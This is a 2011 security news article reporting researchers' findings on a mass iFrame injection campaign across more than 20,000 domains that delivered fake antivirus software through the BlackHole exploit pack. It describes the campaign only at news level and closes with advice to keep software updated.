Mass injection attack compromised 20,000+ domains, delivers fake AV
Posted on 18 August 2011.
Bookmark and Share
A simple mistake on the part of cyber attackers has revealed another mass malicious iFrames injection attack that is currently under way, say Armorize's researchers.

Initially, they forgot to include a tag before the actual malicious code, so it was indexed by Google and, therefore, searchable. The initial number of compromised domains was around 22,400, with a total of 536,000+ infected pages.

Unfortunately, the attackers remedied their mistake and the injected script is not visible to Google anymore, so the current number of affected pages is unknown.

What is known is that the script takes the victims through a number of redirection sites and lands them on a page where a drive-by download script is served by a modified version of the BlackHole exploit pack.

The exploit pack takes advantage of vulnerabilities in the Windows OS, Java, Adobe Reader and Flash Player to install a fake AV solution on the victims' computer. The malware is immediately executed and begins scaring the users:


The fake solution changes its name depending on the OS it encounters on the targeted computer. It is "XP Security 2012" under Windows XP, "Vista Antivirus 2012" under Windows Vista, and "Win 7 Antivirus 2012" under Windows 7.

According to the researchers, the redirecting domains are hosted in Moldova, and the exploit servers in the US. As to how legitimate sites get injected with the malicious iFrame, they say it's mostly by using stolen FTP credentials.

Unfortunately, the malware served has a very low detection rate - 11.6 percent on Virus Total - so the best thing to do to defend oneself from this type of threat is to keep all your software up-to-date in order to thwart the exploit kit.






Spotlight

Attackers use reflection techniques for larger DDoS attacks

Posted on 17 April 2014.  |  Instead of using a network of zombie computers, newer DDoS toolkits abuse Internet protocols that are available on open or vulnerable servers and devices. This approach can lead to the Internet becoming a ready-to-use botnet for malicious actors.


Weekly newsletter

Reading our newsletter every Monday will keep you up-to-date with security news.
  



Daily digest

Receive a daily digest of the latest security news.
  

DON'T
MISS

Fri, Apr 18th
    COPYRIGHT 1998-2014 BY HELP NET SECURITY.   // READ OUR PRIVACY POLICY // ABOUT US // ADVERTISE //